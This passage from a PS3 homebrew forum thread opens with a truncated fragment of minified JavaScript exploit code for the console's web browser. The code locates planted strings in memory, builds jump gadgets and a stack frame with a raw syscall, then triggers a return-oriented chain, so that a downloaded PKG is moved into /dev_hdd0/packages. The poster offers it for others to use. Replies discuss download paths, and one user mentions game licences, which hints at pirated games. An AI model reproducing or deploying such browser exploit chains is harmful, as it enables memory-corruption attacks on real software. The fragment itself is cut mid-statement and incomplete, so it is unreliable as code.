f=d+b.convertedSize();stack_frame=stack_frame_hookup()+syscall(0x0000032C,d,f,0,0,0,0,0,0)+stack_frame_exit();while(stack_frame_addr===0){if(search_max_threshold\74search_size+search_size_ext){frame_fails++;if((frame_fails%10)===0){search_base_off+=0;search_size_ext+=0}load_check();return}stack_frame=stack_frame.replaceAt(0,hexh2bin(0x2A2F));stack_frame_addr=findJsVariableOffset("stack_frame",stack_frame,search_base+search_base_off,search_size+search_size_ext);if(stack_frame_addr==-1)if(search_max_threshold\74search_size+search_size_ext){frame_fails++;load_check();return}search_max_threshold-=search_size+search_size_ext}jump_2=unescape("\u0102\u7EFB")+fill_by_16bytes(0x30,0x8282)+hexw2bin(stack_frame_addr)+unescape("\uFB7E");while(jump_2_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_2=jump_2.replaceAt(0,hexh2bin(0x7EFB));jump_2_addr=findJsVariableOffset("jump_2",jump_2,search_base,search_size);if(jump_2_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}jump_1=unescape("\u4141\u7EFA")+hexw2bin(jump_2_addr)+unescape("\uFA7E");while(jump_1_addr===0){if(search_max_threshold\74search_size){load_check();return}jump_1=jump_1.replaceAt(0,hexh2bin(0x7EFA));jump_1_addr=findJsVariableOffset("jump_1",jump_1,search_base,search_size);if(jump_1_addr==-1)if(search_max_threshold\74search_size){load_check();return}search_max_threshold-=search_size}var g=checkMemory(stack_frame_addr-0x4,0x8000,stack_frame.length);var x=checkMemory(xtra_data_addr-0x4,0x1000,xtra_data.length);var h=checkMemory(jump_2_addr-0x4,0x1000,jump_2.length);var i=checkMemory(jump_1_addr-0x4,0x1000,jump_1.length);if((h===jump_2)&&(i===jump_1)&&(x===xtra_data)&&(g===stack_frame)){if(t_out!==0){clearTimeout(t_out)}triggerX()}else{load_check()}}catch(e){}}function triggerX(){setTimeout(trigger,1000,jump_1_addr);setTimeout(rop_exit,2000,hr);t_out=0;total_loops=0}');

There are instructions on the page itself but basically, you start up a web server on your PC and put the PKG you want to install in the root html folder, named package.png. Then put your server IP in the page and you can download the PKG in the background (you can leave the page while it's downloading). After it's done, click the button and it's renamed into /dev_hdd0/packages. Can change file paths if you want.

If you try it please give feedback, I'm looking to improve upon this

Kazama · Apr 5, 2019

I want to try this !!!! But where is the button to click ?

nexdoor · Jul 22, 2019

So is it possible to redirect downloads from the web browser on multiman? And if so, how?

DeViL303 · Jul 22, 2019

nexdoor said:
So is it possible to redirect downloads from the web browser on multiman? And if so, how?

Not sure what you mean, what is it you want to do? I did not even know multiman had a browser. Where does multiman download files to by default? You could try looking for the path in a HEX editor in the multiman files, and edit it there maybe.

nexdoor · Jul 22, 2019

DeViL303 said:
Not sure what you mean, what is it you want to do? I did not even know multiman had a browser. Where does multiman download files to by default? You could try looking for the path in a HEX editor in the multiman files, and edit it there maybe.

I think ill try using the HEX editor, see what i can do. Since we're already talking about downloads; ive had a slight problem after downloading some games, a message pops up saying tht i need to renew my licence via ps store, not sure what to do i dont want to get banned when i access ps store

PS3 Redirecting browser downloads to /dev_hdd0

lmn7

Kazama

Member

DeViL303

Kazama

Member

lmn7

DeViL303

lmn7

DeViL303

lmn7

DeViL303

lmn7

DeViL303

lmn7

Kazama

Member

lmn7

Kazama

Member

nexdoor

Forum Noob

DeViL303

nexdoor

Forum Noob

Attachments

Similar threads